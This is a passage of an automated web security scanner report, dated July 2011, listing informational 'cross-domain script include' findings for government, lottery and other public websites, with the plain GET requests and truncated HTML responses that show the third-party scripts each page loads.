Cookie: WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1310522436140:ss=1310522357519; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1310522455746:ss=1310522357519; fcspersistslider1=2

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:57:10 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Location: yourgovernment.shtml
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30180

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>

<meta
...[SNIP]...
<script language="javascript" type="text/javascript" src="http://server.iad.liveperson.net/hc/33511087/x.js?cmd=file&file=chatScript3&site=33511087"> </script>
...[SNIP]...

13.35. http://www.destateparks.com/fees/entry/annual-pass.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.destateparks.com
Path:	/fees/entry/annual-pass.asp

Issue detail

The response dynamically includes the following scripts from other domains:

http://assets.flashstall.com/js/swfobject-2.2.js
http://widgets.twimg.com/j/2/widget.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /fees/entry/annual-pass.asp HTTP/1.1
Host: www.destateparks.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Wed, 13 Jul 2011 02:01:35 GMT
Content-Length: 18645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<div class="twittercontainer">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://assets.flashstall.com/js/swfobject-2.2.js"></script>
...[SNIP]...

13.36. http://www.dos.state.ny.us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dos.state.ny.us
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://widgets.twimg.com/j/2/widget.js

Request

GET / HTTP/1.1
Host: www.dos.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 29096
Content-Type: text/html
Content-Location: http://www.dos.state.ny.us/index.html
Last-Modified: Fri, 08 Jul 2011 13:42:25 GMT
Accept-Ranges: bytes
ETag: "ef9119df743dcc1:4a3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 01:51:29 GMT
Connection: close

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New York State Department of State</title>

<link href="css/nav02.css" rel="stylesheet" t
...[SNIP]...
</div>
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

13.37. http://www.facebook.com/NewJerseyLottery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/NewJerseyLottery

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/rK9hU7iYtfp.js

Request

GET /NewJerseyLottery HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.38. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/OWWAkKnpuow.js
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/fvZFkQjGc7h.js
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/uOvB-PjImrg.js
http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/rK9hU7iYtfp.js

Request

Response

13.39. http://www.iloveny.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.iloveny.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=8a273f8f-7676-c08732c6-dedb-4d7f-9d31-894dd71fe8ef&lID=1&loc=4q-web2
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAA7-hefdT1azWatvEXjgirLRSUE6bbTfscIVqxKVfUgy5SoqltzhTzKDMe-FqxWjqjUnX9zefPt6DKVA
http://s7.addthis.com/js/250/addthis_widget.js

Request

GET / HTTP/1.1
Host: www.iloveny.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.40. http://www.labor.state.ny.us/ui/ui_index.shtm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.labor.state.ny.us
Path:	/ui/ui_index.shtm

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit
http://www.labor.ny.gov/sites/home/assets/js/content-utility.js
http://www.labor.ny.gov/sites/home/assets/js/modal-video/linkvideo2.js

Request

GET /ui/ui_index.shtm HTTP/1.1
Host: www.labor.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:52:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 29320
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Unem
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=nysdol"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="Javascript" src="http://www.labor.ny.gov/sites/home/assets/js/content-utility.js"></script> 
<script type="text/javascript" language="Javascript" src="http://www.labor.ny.gov/sites/home/assets/js/modal-video/linkvideo2.js"></script>
...[SNIP]...
</div>
<script src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

13.41. http://www.louise.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.louise.house.gov
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://w.sharethis.com/button/sharethis.js

Request

GET / HTTP/1.1
Host: www.louise.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:50:57 GMT
Server: Apache
Set-Cookie: ce12a43d31101321362cf131b5cb4bf5=2m8kqb9hvsqs9ciisr3ds8m881; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:50:58 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 65651
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>



<!--[if IE 8 ]> <html lang="en" clas
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=RepHoyer&headerbg=%23000099&inactivebg=%23CCCCCC&inactivefg=%23454545&linkfg=%23AB0909"></script>
...[SNIP]...

13.42. http://www.nj.gov/njbusiness/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nj.gov
Path:	/njbusiness/

Issue detail

The response dynamically includes the following script from another domain:

http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit

Request

GET /njbusiness/ HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:51 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<he
...[SNIP]...
</script><script src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit" type="text/javascript"></script>
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

13.43. http://www.nj.gov/njbusiness/licenses/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nj.gov
Path:	/njbusiness/licenses/

Issue detail

The response dynamically includes the following script from another domain:

http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit

Request

GET /njbusiness/licenses/ HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:52 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>NJ Business P
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

13.44. http://www.nj.gov/njbusiness/registration/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nj.gov
Path:	/njbusiness/registration/

Issue detail

The response dynamically includes the following script from another domain:

http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit

Request

GET /njbusiness/registration/ HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:53 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>NJ Business P
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

13.45. http://www.nj.gov/njbusiness/starting/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nj.gov
Path:	/njbusiness/starting/

Issue detail

The response dynamically includes the following script from another domain:

http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit

Request

GET /njbusiness/starting/ HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.46. http://www.nj.gov/njbusiness/tax/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nj.gov
Path:	/njbusiness/tax/

Issue detail

The response dynamically includes the following script from another domain:

http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit

Request

GET /njbusiness/tax/ HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.47. http://www.nj.gov/njbusiness/workforce/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nj.gov
Path:	/njbusiness/workforce/

Issue detail

The response dynamically includes the following script from another domain:

http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit

Request

GET /njbusiness/workforce/ HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.48. http://www.nysenate.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nysenate.gov
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://assets.percentmobile.com/percent_mobile.js
http://static.mogulus.com/scripts/playerv2.js?channel=nysenate&layout=playerEmbedDefault&backgroundColor=0xffffff&backgroundAlpha=1&backgroundGradientStrength=0&chromeColor=0x000000&headerBarGlossEnabled=true&controlBarGlossEnabled=true&chatInputGlossEnabled=false&uiWhite=true&uiAlpha=0.5&uiSelectedAlpha=1&dropShadowEnabled=true&dropShadowHorizontalDistance=10&dropShadowVerticalDistance=10&paddingLeft=0&paddingRight=0&paddingTop=0&paddingBottom=0&cornerRadius=3&backToDirectoryURL=null&bannerURL=null&bannerText=null&bannerWidth=320&bannerHeight=50&showViewers=true&embedEnabled=true&chatEnabled=false&onDemandEnabled=true&programGuideEnabled=false&fullScreenEnabled=true&reportAbuseEnabled=false&gridEnabled=false&initialIsOn=false&initialIsMute=false&initialVolume=10&contentId=null&initThumbUrl=null&playeraspectwidth=4&playeraspectheight=3&mogulusLogoEnabled=false&width=270&height=211&wmode=window

Request

GET / HTTP/1.1
Host: www.nysenate.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1310521787"
Cache-Control: public, max-age=300
Last-Modified: Wed, 13 Jul 2011 01:49:47 GMT
X-AH-Environment: prod
Cache-Control: s-maxage=10
Content-Length: 69987
Date: Wed, 13 Jul 2011 01:50:14 GMT
X-Varnish: 1926341654 1926340181
Age: 25
Via: 1.1 varnish
Connection: close
X-Cache: HIT
X-Cache-Hits: 2

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<script src="http://assets.percentmobile.com/percent_mobile.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<div id="conditional-livestream"><script src="http://static.mogulus.com/scripts/playerv2.js?channel=nysenate&layout=playerEmbedDefault&backgroundColor=0xffffff&backgroundAlpha=1&backgroundGradientStrength=0&chromeColor=0x000000&headerBarGlossEnabled=true&controlBarGlossEnabled=true&chatInputGlossEnabled=false&uiWhite=true&uiAlpha=0.5&uiSelectedAlpha=1&dropShadowEnabled=true&dropShadowHorizontalDistance=10&dropShadowVerticalDistance=10&paddingLeft=0&paddingRight=0&paddingTop=0&paddingBottom=0&cornerRadius=3&backToDirectoryURL=null&bannerURL=null&bannerText=null&bannerWidth=320&bannerHeight=50&showViewers=true&embedEnabled=true&chatEnabled=false&onDemandEnabled=true&programGuideEnabled=false&fullScreenEnabled=true&reportAbuseEnabled=false&gridEnabled=false&initialIsOn=false&initialIsMute=false&initialVolume=10&contentId=null&initThumbUrl=null&playeraspectwidth=4&playeraspectheight=3&mogulusLogoEnabled=false&width=270&height=211&wmode=window" type="text/javascript"></script>
...[SNIP]...

13.49. http://www.opensource.org/licenses/gpl-3.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/gpl-3.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /licenses/gpl-3.0.html HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.50. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.51. http://www.osc.state.ny.us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.osc.state.ny.us
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/mootools/1.2.4/mootools-yui-compressed.js

Request

GET / HTTP/1.1
Host: www.osc.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 21156
Content-Type: text/html
Content-Location: http://www.osc.state.ny.us/index.htm
Last-Modified: Thu, 07 Jul 2011 15:10:59 GMT
Accept-Ranges: bytes
ETag: "e5c02d14b83ccc1:11aa"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 01:50:16 GMT
Connection: close

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.2.4/mootools-yui-compressed.js"></script>
...[SNIP]...

13.52. http://www.osc.state.ny.us/ouf/index.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.osc.state.ny.us
Path:	/ouf/index.htm

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/mootools/1.2.4/mootools-yui-compressed.js

Request

GET /ouf/index.htm HTTP/1.1
Host: www.osc.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 14133
Content-Type: text/html
Last-Modified: Thu, 07 Jul 2011 10:45:28 GMT
Accept-Ranges: bytes
ETag: "b498b7fc923ccc1:11aa"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 01:50:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.2.4/mootools-yui-compressed.js"></script>
...[SNIP]...

13.53. http://www.search.state.ny.us/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.search.state.ny.us
Path:	/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google-analytics.com/urchin.js
http://www.nysegov.com/leftMenu.js

Request

Response

13.54. http://www.state.nj.us/lottery/about/6-0_about.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/about/6-0_about.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

Request

GET /lottery/about/6-0_about.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.55. http://www.state.nj.us/lottery/didiwin/8-0_did_i_win.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/didiwin/8-0_did_i_win.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

Request

GET /lottery/didiwin/8-0_did_i_win.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.56. http://www.state.nj.us/lottery/games/1-0_numbers_draw_games.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/games/1-0_numbers_draw_games.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

Request

GET /lottery/games/1-0_numbers_draw_games.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:18 GMT
Content-length: 13087
Content-type: text/html
Last-modified: Mon, 11 Jul 2011 19:14:37 GMT
Etag: "331f-4e1b4b9d"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>

<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.57. http://www.state.nj.us/lottery/games/1-1_powerball.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/games/1-1_powerball.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

Request

GET /lottery/games/1-1_powerball.shtml HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:18 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>

<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.58. http://www.state.nj.us/lottery/games/1-2_mega_millions.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/games/1-2_mega_millions.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

Request

GET /lottery/games/1-2_mega_millions.shtml HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:19 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>

<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.59. http://www.state.nj.us/lottery/games/1-3_pick6.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/games/1-3_pick6.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

Request

GET /lottery/games/1-3_pick6.shtml HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.60. http://www.state.nj.us/lottery/games/1-4_jersey_cash5.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/games/1-4_jersey_cash5.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

Request

GET /lottery/games/1-4_jersey_cash5.shtml HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:20 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>

<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.61. http://www.state.nj.us/lottery/games/1-5_pick4.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/games/1-5_pick4.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

Request

GET /lottery/games/1-5_pick4.shtml HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.62. http://www.state.nj.us/lottery/games/1-6_pick3.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/games/1-6_pick3.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
